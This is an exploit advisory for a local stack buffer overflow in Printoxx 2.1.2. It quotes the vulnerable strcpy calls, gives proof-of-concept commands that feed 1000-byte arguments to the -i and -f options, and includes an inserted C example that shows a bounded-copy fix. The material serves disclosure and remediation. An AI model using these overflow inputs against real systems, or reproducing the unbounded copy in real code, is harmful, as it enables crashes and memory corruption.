# Exploit Title: Printoxx Local Buffer Overflow
# Date: 23 Dec, 2009
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Software Link: http://kornelix.squarespace.com/printoxx/, http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz
# Version: <= 2.1.2
# Tested on: Fedora 12
# CVE: None
# Code:

Description:

"from website"

Printoxx is a free open source Linux program for making and printing a
photo montage. Images can be added to a layout page using the mouse to
select and drop into place. Images can be moved around and resized
using the mouse. Text can be added using any font, and moved around as
needed.

Vulnerability:

Printoxx does not check the length of the filename/directory given on the command line and copies it with strcpy into a fixed buffer of 1000 bytes, so an argument of that length or longer overflows the buffer. The affected code segment is shown below.

Affected Code Segment:

.....
else if (strEqu(argv[ii],"-i") && argc > ii+1) // -i imageDirectory
    strcpy(imagedirk,argv[++ii]); //Overflow
else if (strEqu(argv[ii],"-f") && argc > ii+1) // -f imageFile
    strcpy(clfile,argv[++ii]); //Overflow
else strcpy(clfile,argv[ii]); //Overflow // assume imageFile
}
......

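As an added illustration, not part of the original advisory and not Printoxx's own code, the C program below re-creates the option-parsing loop above with a bounded copy: any -i/-f argument (or bare argument) that does not fit in the 1000-byte buffer, terminating NUL included, is rejected before anything is written, so the program no longer depends on the stack canary to catch the overwrite after the fact. The names parse_printoxx_args, copy_arg_checked, accepts_arg_of_length and PATH_BUF are assumptions made for this example, and strEqu is replaced by the standard strcmp.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1000   /* buffer size quoted in the advisory */

/* Bounded copy (added example, not Printoxx code): copies src and its NUL
 * into dst and returns 0, or returns -1 when src does not fit in dstsize
 * bytes. It never reads more than dstsize bytes of src. */
static int copy_arg_checked(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;
    while (n < dstsize && src[n] != '\0')
        n++;
    if (n == dstsize)          /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hypothetical hardened version of the advisory's loop: -i imageDirectory,
 * -f imageFile, any other argument is taken as imageFile. Returns 0 on
 * success or -1 as soon as an argument would overflow its buffer. */
int parse_printoxx_args(int argc, char **argv, char *imagedirk, char *clfile,
                        size_t bufsize)
{
    imagedirk[0] = '\0';
    clfile[0] = '\0';
    for (int ii = 1; ii < argc; ii++) {
        if (strcmp(argv[ii], "-i") == 0 && argc > ii + 1) {
            if (copy_arg_checked(imagedirk, bufsize, argv[++ii]) != 0)
                return -1;
        } else if (strcmp(argv[ii], "-f") == 0 && argc > ii + 1) {
            if (copy_arg_checked(clfile, bufsize, argv[++ii]) != 0)
                return -1;
        } else if (copy_arg_checked(clfile, bufsize, argv[ii]) != 0) {
            return -1;
        }
    }
    return 0;
}

/* Test helper: builds an argv carrying one constructed argument of len 'A'
 * characters (preceded by flag unless flag is NULL, which exercises the
 * bare-argument path) and returns 1 if the parser accepts it, 0 if not. */
int accepts_arg_of_length(const char *flag, size_t len)
{
    char *big = malloc(len + 1);
    if (big == NULL)
        return 0;
    memset(big, 'A', len);
    big[len] = '\0';

    char imagedirk[PATH_BUF], clfile[PATH_BUF];
    char *argv[4] = { "printoxx", NULL, NULL, NULL };
    int argc = 1;
    if (flag != NULL)
        argv[argc++] = (char *)flag;
    argv[argc++] = big;

    int rc = parse_printoxx_args(argc, argv, imagedirk, clfile, sizeof imagedirk);
    free(big);
    return rc == 0;
}

int main(int argc, char **argv)
{
    char imagedirk[PATH_BUF], clfile[PATH_BUF];
    if (parse_printoxx_args(argc, argv, imagedirk, clfile, sizeof imagedirk) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", PATH_BUF - 1);
        return 1;
    }
    printf("imagedirk=\"%s\" clfile=\"%s\"\n", imagedirk, clfile);
    return 0;
}
```

Run with the same -i/-f arguments as the proof of concept below: a 999-byte argument is accepted, a 1000-byte one is refused with an error message and exit status 1 instead of a stack-smashing abort. The length check is the fix; the canary the note below describes only turns a silent corruption into a crash.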
Proof Of Concept:

Image filename overflow:

$ ./printoxx -i $(python -c 'print "A"*1000')

Directory filename overflow:

$ ./printoxx -f $(python -c 'print "A"*1000')

Severity: Very Low

Note: Since this was tested on Fedora 12, the system automatically detected the operation as a possible buffer overflow attempt instead of a regular segfault. This is because all executables on Red Hat (RHEL) and Fedora systems are compiled with stack canaries enabled.